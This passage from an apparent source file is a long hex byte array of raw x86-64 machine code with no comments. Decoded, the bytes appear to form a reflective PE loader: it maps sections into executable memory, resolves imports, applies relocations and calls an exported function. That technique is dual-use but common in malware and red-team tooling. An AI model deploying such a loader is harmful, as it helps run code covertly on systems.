438 | 0x45, 0x18, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x85, 0xc0, 0x74, 0x28, 0x48, | |
439 | 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x00, 0x48, 0x8b, | |
440 | 0x40, 0x10, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x52, 0x28, 0x48, 0x89, | |
441 | 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40, 0x28, 0x00, | |
442 | 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x20, 0x48, | |
443 | 0x85, 0xc0, 0x74, 0x28, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x20, | |
444 | 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x55, 0x18, 0x48, | |
445 | 0x8b, 0x52, 0x20, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, | |
446 | 0x48, 0xc7, 0x40, 0x20, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, | |
447 | 0x48, 0x8b, 0x40, 0x18, 0x48, 0x85, 0xc0, 0x74, 0x28, 0x48, 0x8b, 0x45, | |
448 | 0x18, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, | |
449 | 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x89, 0xd1, 0xff, | |
450 | 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40, 0x18, 0x00, 0x00, 0x00, | |
451 | 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x85, 0xc0, | |
452 | 0x74, 0x44, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, | |
453 | 0x00, 0x48, 0x8b, 0x40, 0x58, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x52, | |
454 | 0x10, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, | |
455 | 0x40, 0x10, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x55, | |
456 | 0x18, 0x48, 0x8b, 0x52, 0x10, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, | |
457 | 0x45, 0x18, 0x48, 0xc7, 0x40, 0x10, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, | |
458 | 0x45, 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x85, 0xc0, 0x74, 0x28, 0x48, | |
459 | 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x00, 0x48, 0x8b, | |
460 | 0x40, 0x10, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x52, 0x08, 0x48, 0x89, | |
461 | 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40, 0x08, 0x00, | |
462 | 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x85, | |
463 | 0xc0, 0x74, 0x25, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8b, | |
464 | 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x12, | |
465 | 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x00, | |
466 | 0x00, 0x00, 0x00, 0x00, 0x90, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, | |
467 | 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xeb, | |
468 | 0x0a, 0x48, 0x83, 0x45, 0x10, 0x01, 0x48, 0x83, 0x45, 0x18, 0x01, 0x48, | |
469 | 0x8b, 0x45, 0x10, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x12, 0x48, 0x8b, | |
470 | 0x45, 0x10, 0x0f, 0xb6, 0x10, 0x48, 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00, | |
471 | 0x38, 0xc2, 0x74, 0xd9, 0x48, 0x8b, 0x45, 0x10, 0x0f, 0xb6, 0x00, 0x0f, | |
472 | 0xb6, 0xd0, 0x48, 0x8b, 0x45, 0x18, 0x0f, 0xb6, 0x00, 0x0f, 0xb6, 0xc0, | |
473 | 0x29, 0xc2, 0x89, 0xd0, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0xd0, 0x01, | |
474 | 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, | |
475 | 0x8d, 0x60, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x85, 0x08, 0x01, 0x00, 0x00, | |
476 | 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x85, 0x10, 0x01, 0x00, 0x00, 0x00, | |
477 | 0x00, 0x00, 0x00, 0xc7, 0x45, 0xa0, 0x31, 0xc0, 0x48, 0x79, 0xc7, 0x45, | |
478 | 0xa4, 0x1b, 0x8b, 0x44, 0x24, 0xc7, 0x45, 0xa8, 0x04, 0x8b, 0x4c, 0x24, | |
479 | 0xc7, 0x45, 0xac, 0x08, 0x8b, 0x54, 0x24, 0xc7, 0x45, 0xb0, 0x0c, 0x52, | |
480 | 0x81, 0xc2, 0xc7, 0x45, 0xb4, 0x00, 0x02, 0x00, 0x00, 0xc7, 0x45, 0xb8, | |
481 | 0x83, 0xe9, 0x01, 0x75, 0xc7, 0x45, 0xbc, 0xf4, 0xff, 0xd0, 0xc3, 0xc7, | |
482 | 0x45, 0xc0, 0x48, 0x81, 0xec, 0x48, 0xc7, 0x45, 0xc4, 0x01, 0x00, 0x00, | |
483 | 0x48, 0xc7, 0x45, 0xc8, 0x89, 0xac, 0x24, 0x30, 0xc7, 0x45, 0xcc, 0x01, | |
484 | 0x00, 0x00, 0x48, 0xc7, 0x45, 0xd0, 0x89, 0x9c, 0x24, 0x38, 0xc7, 0x45, | |
485 | 0xd4, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xd8, 0x89, 0xbc, 0x24, 0x20, | |
486 | 0xc7, 0x45, 0xdc, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xe0, 0x89, 0xb4, | |
487 | 0x24, 0x28, 0xc7, 0x45, 0xe4, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xe8, | |
488 | 0x89, 0xe6, 0x48, 0x89, 0xc7, 0x45, 0xec, 0xcf, 0xb8, 0x00, 0x02, 0xc7, | |
489 | 0x45, 0xf0, 0x00, 0x00, 0x4c, 0x89, 0xc7, 0x45, 0xf4, 0xc1, 0x48, 0x8d, | |
490 | 0x14, 0xc7, 0x45, 0xf8, 0x01, 0x4c, 0x8d, 0x04, 0xc7, 0x45, 0xfc, 0x02, | |
491 | 0x4d, 0x8d, 0x0c, 0xc7, 0x45, 0x00, 0x00, 0x49, 0x8d, 0x1c, 0xc7, 0x45, | |
492 | 0x04, 0x01, 0x48, 0x89, 0x9c, 0xc7, 0x45, 0x08, 0x24, 0x00, 0x01, 0x00, | |
493 | 0xc7, 0x45, 0x0c, 0x00, 0x48, 0x01, 0xc3, 0xc7, 0x45, 0x10, 0x48, 0x89, | |
494 | 0x9c, 0x24, 0xc7, 0x45, 0x14, 0x08, 0x01, 0x00, 0x00, 0xc7, 0x45, 0x18, | |
495 | 0x48, 0x01, 0xc3, 0x48, 0xc7, 0x45, 0x1c, 0x89, 0x9c, 0x24, 0x10, 0xc7, | |
496 | 0x45, 0x20, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x24, 0x01, 0xc3, 0x48, | |
497 | 0x89, 0xc7, 0x45, 0x28, 0x9c, 0x24, 0x18, 0x01, 0xc7, 0x45, 0x2c, 0x00, | |
498 | 0x00, 0xff, 0xd7, 0xc7, 0x45, 0x30, 0x48, 0x89, 0xf4, 0x48, 0xc7, 0x45, | |
499 | 0x34, 0x8b, 0xb4, 0x24, 0x28, 0xc7, 0x45, 0x38, 0x01, 0x00, 0x00, 0x48, | |
500 | 0xc7, 0x45, 0x3c, 0x8b, 0xbc, 0x24, 0x20, 0xc7, 0x45, 0x40, 0x01, 0x00, | |
501 | 0x00, 0x48, 0xc7, 0x45, 0x44, 0x8b, 0x9c, 0x24, 0x38, 0xc7, 0x45, 0x48, | |
502 | 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x4c, 0x8b, 0xac, 0x24, 0x30, 0xc7, | |
503 | 0x45, 0x50, 0x01, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x54, 0x81, 0xc4, 0x48, | |
504 | 0x01, 0xc7, 0x45, 0x58, 0x00, 0x00, 0xc3, 0x00, 0x48, 0x8b, 0x85, 0x60, | |
505 | 0x01, 0x00, 0x00, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01, | |
506 | 0x75, 0x16, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x05, 0x48, | |
507 | 0x07, 0x00, 0x00, 0x48, 0x89, 0x85, 0x18, 0x01, 0x00, 0x00, 0xeb, 0x15, | |
508 | 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x48, 0x07, | |
509 | 0x00, 0x00, 0x48, 0x89, 0x85, 0x18, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, | |
510 | 0x18, 0x01, 0x00, 0x00, 0x48, 0x05, 0x18, 0x19, 0x00, 0x00, 0x48, 0x89, | |
511 | 0x85, 0x00, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x01, 0x00, 0x00, | |
512 | 0x48, 0x89, 0x85, 0xf8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf8, 0x00, | |
513 | 0x00, 0x00, 0x8b, 0x40, 0x3c, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x85, 0x00, | |
514 | 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xf0, 0x00, 0x00, | |
515 | 0x00, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x40, | |
516 | 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x85, 0xe8, 0x00, | |
517 | 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x89, 0x85, | |
518 | 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x8b, | |
519 | 0x40, 0x3c, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x85, 0xe8, 0x00, 0x00, 0x00, | |
520 | 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b, | |
521 | 0x85, 0xf0, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x50, 0x04, 0x48, 0x8b, 0x85, | |
522 | 0xd8, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x40, 0x04, 0x66, 0x39, 0xc2, 0x0f, | |
523 | 0x85, 0xa1, 0x06, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, | |
524 | 0x48, 0x8b, 0x40, 0x48, 0x48, 0x8b, 0x95, 0xf0, 0x00, 0x00, 0x00, 0x8b, | |
525 | 0x52, 0x50, 0x81, 0xc2, 0x00, 0x10, 0x00, 0x00, 0x89, 0xd2, 0x41, 0xb9, | |
526 | 0x40, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30, 0x00, 0x00, 0xb9, 0x00, | |
527 | 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x08, 0x01, 0x00, 0x00, | |
528 | 0x48, 0x83, 0xbd, 0x08, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x5f, 0x06, | |
529 | 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x40, | |
530 | 0x14, 0x0f, 0xb7, 0xd0, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x48, | |
531 | 0x01, 0xd0, 0x48, 0x83, 0xc0, 0x18, 0x48, 0x89, 0x85, 0xd0, 0x00, 0x00, | |
532 | 0x00, 0xc7, 0x85, 0x24, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe9, | |
533 | 0x9a, 0x00, 0x00, 0x00, 0x8b, 0x95, 0x24, 0x01, 0x00, 0x00, 0x48, 0x89, | |
534 | 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0, 0x48, 0xc1, 0xe0, 0x03, | |
535 | 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x01, | |
536 | 0xd0, 0x8b, 0x40, 0x10, 0x41, 0x89, 0xc0, 0x8b, 0x95, 0x24, 0x01, 0x00, | |
537 | 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0, 0x48, | |
538 | 0xc1, 0xe0, 0x03, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xd0, 0x00, 0x00, | |
539 | 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x40, 0x14, 0x89, 0xc2, 0x48, 0x8b, 0x85, | |
540 | 0x00, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x0c, 0x02, 0x8b, 0x95, 0x24, 0x01, | |
541 | 0x00, 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0, | |
542 | 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xd0, 0x00, | |
543 | 0x00, 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x40, 0x0c, 0x89, 0xc2, 0x48, 0x8b, | |
544 | 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0xca, 0x48, | |
545 | 0x89, 0xc1, 0xe8, 0x4d, 0x20, 0x00, 0x00, 0x83, 0x85, 0x24, 0x01, 0x00, | |
546 | 0x00, 0x01, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x40, | |
547 | 0x06, 0x0f, 0xb7, 0xc0, 0x3b, 0x85, 0x24, 0x01, 0x00, 0x00, 0x0f, 0x87, | |
548 | 0x4c, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x8b, | |
549 | 0x80, 0x90, 0x00, 0x00, 0x00, 0x89, 0x85, 0xcc, 0x00, 0x00, 0x00, 0x8b, | |
550 | 0x95, 0xcc, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, | |
551 | 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x38, 0x01, 0x00, 0x00, 0xe9, 0x39, | |
552 | 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x38, 0x01, 0x00, 0x00, 0x8b, 0x40, | |
553 | 0x0c, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, | |
554 | 0xd0, 0x48, 0x89, 0x85, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x60, | |
555 | 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x95, 0xc0, 0x00, | |
556 | 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0xb8, 0x00, | |
557 | 0x00, 0x00, 0x48, 0x8b, 0x85, 0x38, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x89, | |
558 | 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, | |
559 | 0x89, 0x85, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x38, 0x01, 0x00, | |
560 | 0x00, 0x8b, 0x40, 0x10, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, | |
561 | 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x40, 0x01, 0x00, 0x00, 0x48, | |
562 | 0x8b, 0x85, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x85, 0xc0, | |
563 | 0x0f, 0x84, 0xa9, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x40, 0x01, 0x00, | |
564 | 0x00, 0x48, 0x89, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x48, | |
565 | 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x85, 0xc0, 0x79, 0x30, 0x48, | |
566 | 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b, | |
567 | 0x95, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x12, 0x0f, 0xb7, 0xd2, 0x48, | |
568 | 0x8b, 0x8d, 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc2, 0x48, | |
569 | 0x8b, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x10, 0xeb, 0x47, 0x48, | |
570 | 0x8b, 0x85, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x10, 0x48, 0x8b, 0x85, | |
571 | 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xa8, 0x00, | |
572 | 0x00, 0x00, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, | |
573 | 0x38, 0x48, 0x8b, 0x95, 0xa8, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc2, 0x02, | |
574 | 0x48, 0x8b, 0x8d, 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc2, | |
575 | 0x48, 0x8b, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x10, 0x48, 0x83, | |
576 | 0x85, 0x48, 0x01, 0x00, 0x00, 0x08, 0x48, 0x83, 0x85, 0x40, 0x01, 0x00, | |
577 | 0x00, 0x08, 0xe9, 0x44, 0xff, 0xff, 0xff, 0x90, 0x48, 0x83, 0x85, 0x38, | |
578 | 0x01, 0x00, 0x00, 0x14, 0x48, 0x8b, 0x85, 0x38, 0x01, 0x00, 0x00, 0x8b, | |
579 | 0x40, 0x0c, 0x85, 0xc0, 0x0f, 0x85, 0xb5, 0xfe, 0xff, 0xff, 0x48, 0x8b, | |
580 | 0x85, 0xf0, 0x00, 0x00, 0x00, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x89, | |
581 | 0x85, 0xcc, 0x00, 0x00, 0x00, 0x8b, 0x95, 0xcc, 0x00, 0x00, 0x00, 0x48, | |
582 | 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, | |
583 | 0x28, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf0, 0x00, 0x00, 0x00, 0x48, | |
584 | 0x8b, 0x40, 0x30, 0x48, 0xf7, 0xd8, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x85, | |
585 | 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xa0, 0x00, | |
586 | 0x00, 0x00, 0xe9, 0xdc, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x28, 0x01, | |
587 | 0x00, 0x00, 0x48, 0x83, 0xc0, 0x08, 0x48, 0x89, 0x85, 0x30, 0x01, 0x00, | |
588 | 0x00, 0xe9, 0x94, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x30, 0x01, 0x00, | |
589 | 0x00, 0x0f, 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x3c, 0xa0, 0x75, 0x64, | |
590 | 0x48, 0x8b, 0x85, 0x28, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x89, 0xc2, 0x48, | |
591 | 0x8b, 0x85, 0x30, 0x01, 0x00, 0x00, 0x0f, 0xb7, 0x00, 0x66, 0x25, 0xff, | |
592 | 0x0f, 0x0f, 0xb7, 0xc0, 0x48, 0x01, 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, | |
593 | 0x00, 0x00, 0x48, 0x01, 0xc2, 0x48, 0x8b, 0x85, 0x28, 0x01, 0x00, 0x00, | |
594 | 0x8b, 0x00, 0x89, 0xc1, 0x48, 0x8b, 0x85, 0x30, 0x01, 0x00, 0x00, 0x0f, | |
595 | 0xb7, 0x00, 0x66, 0x25, 0xff, 0x0f, 0x0f, 0xb7, 0xc0, 0x48, 0x01, 0xc1, | |
596 | 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xc8, 0x48, 0x8b, | |
597 | 0x08, 0x48, 0x8b, 0x85, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x01, 0xc8, 0x48, | |
598 | 0x89, 0x02, 0xeb, 0x16, 0x48, 0x8b, 0x85, 0x30, 0x01, 0x00, 0x00, 0x0f, | |
599 | 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x84, 0xc0, 0x0f, 0x85, 0xd9, 0x02, | |
600 | 0x00, 0x00, 0x48, 0x83, 0x85, 0x30, 0x01, 0x00, 0x00, 0x02, 0x48, 0x8b, | |
601 | 0x85, 0x28, 0x01, 0x00, 0x00, 0x8b, 0x40, 0x04, 0x89, 0xc2, 0x48, 0x8b, | |
602 | 0x85, 0x28, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x3b, 0x85, 0x30, | |
603 | 0x01, 0x00, 0x00, 0x0f, 0x85, 0x49, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x85, | |
604 | 0x30, 0x01, 0x00, 0x00, 0x48, 0x89, 0x85, 0x28, 0x01, 0x00, 0x00, 0x48, | |
605 | 0x8b, 0x85, 0x28, 0x01, 0x00, 0x00, 0x8b, 0x00, 0x85, 0xc0, 0x0f, 0x85, | |
606 | 0x13, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x85, 0x18, 0x01, 0x00, 0x00, 0x8b, | |
607 | 0x00, 0x83, 0xf8, 0x03, 0x0f, 0x85, 0x5b, 0x02, 0x00, 0x00, 0x48, 0x8b, | |
608 | 0x85, 0x18, 0x01, 0x00, 0x00, 0x0f, 0xb7, 0x80, 0x04, 0x06, 0x00, 0x00, | |
609 | 0x66, 0x85, 0xc0, 0x0f, 0x84, 0x10, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, | |
610 | 0xf0, 0x00, 0x00, 0x00, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x89, 0x85, | |
611 | 0xcc, 0x00, 0x00, 0x00, 0x83, 0xbd, 0xcc, 0x00, 0x00, 0x00, 0x00, 0x0f, | |
612 | 0x84, 0x4a, 0x02, 0x00, 0x00, 0x8b, 0x95, 0xcc, 0x00, 0x00, 0x00, 0x48, | |
613 | 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, | |
614 | 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x98, 0x00, 0x00, 0x00, 0x8b, | |
615 | 0x40, 0x18, 0x89, 0x85, 0x20, 0x01, 0x00, 0x00, 0x83, 0xbd, 0x20, 0x01, | |
616 | 0x00, 0x00, 0x00, 0x0f, 0x84, 0x16, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, | |
617 | 0x98, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x1c, 0x89, 0xc2, 0x48, 0x8b, 0x85, | |
618 | 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x90, 0x00, | |
619 | 0x00, 0x00, 0x48, 0x8b, 0x85, 0x98, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x20, | |
620 | 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, | |
621 | 0x48, 0x89, 0x85, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x98, 0x00, | |
622 | 0x00, 0x00, 0x8b, 0x40, 0x24, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0x08, 0x01, | |
623 | 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x80, 0x00, 0x00, 0x00, | |
624 | 0x8b, 0x85, 0x20, 0x01, 0x00, 0x00, 0x83, 0xe8, 0x01, 0x89, 0xc0, 0x48, | |
625 | 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x88, 0x00, | |
626 | 0x00, 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x85, | |
627 | 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x45, 0x78, 0x48, | |
628 | 0x8b, 0x85, 0x18, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x90, 0x04, 0x06, 0x00, | |
629 | 0x00, 0x48, 0x8b, 0x45, 0x78, 0x48, 0x89, 0xc1, 0xe8, 0x5a, 0xf8, 0xff, | |
630 | 0xff, 0x85, 0xc0, 0x75, 0x48, 0x8b, 0x85, 0x20, 0x01, 0x00, 0x00, 0x83, | |
631 | 0xe8, 0x01, 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x85, 0x80, | |
632 | 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0, | |
633 | 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, | |
634 | 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, | |
635 | 0x85, 0x08, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x10, | |
636 | 0x01, 0x00, 0x00, 0xeb, 0x14, 0x83, 0xad, 0x20, 0x01, 0x00, 0x00, 0x01, | |
637 | 0x83, 0xbd, 0x20, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x57, 0xff, 0xff, | |
638 | 0xff, 0x48, 0x83, 0xbd, 0x10, 0x01, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x07, | |
639 | 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, | |
640 | 0x40, 0x48, 0x41, 0xb9, 0x40, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30, | |
641 | 0x00, 0x00, 0xba, 0xbc, 0x00, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, | |
642 | 0xff, 0xd0, 0x48, 0x89, 0x45, 0x70, 0x48, 0x83, 0x7d, 0x70, 0x00, 0x0f, | |
643 | 0x84, 0xd6, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xa0, 0x48, 0x8b, 0x45, | |
644 | 0x70, 0x41, 0xb8, 0xbc, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0xa1, | |
645 | 0x1b, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x18, 0x01, 0x00, 0x00, 0x48, 0x8d, | |
646 | 0x90, 0x08, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x18, 0x01, 0x00, 0x00, | |
647 | 0x8b, 0x80, 0x04, 0x08, 0x00, 0x00, 0x41, 0x89, 0xc1, 0x48, 0x8b, 0x8d, | |
648 | 0x10, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x70, 0x49, 0x89, 0xd0, 0x44, | |
649 | 0x89, 0xca, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x70, 0x41, 0xb8, 0xbc, 0x00, | |
650 | 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x11, | |
651 | 0x1b, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x48, 0x8b, | |
652 | 0x40, 0x50, 0x48, 0x8b, 0x4d, 0x70, 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00, | |
653 | 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0xeb, 0x5a, 0x48, 0x8b, 0x85, | |
654 | 0xf0, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x28, 0x89, 0xc2, 0x48, 0x8b, 0x85, | |
